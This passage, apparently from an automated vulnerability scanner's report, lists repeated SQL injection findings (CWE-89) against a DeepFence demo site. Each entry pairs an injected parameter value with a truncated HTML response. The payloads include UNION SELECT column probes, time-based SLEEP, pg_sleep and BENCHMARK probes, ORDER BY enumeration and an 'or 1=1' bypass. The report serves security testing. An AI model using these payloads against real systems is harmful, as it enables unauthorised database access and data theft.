unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #621\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #622\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #623\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #624\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\"^\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #625\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #626\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #627\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #628\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #629\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #630\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #631\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or \"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #632\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAnD SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #633\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #634\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID 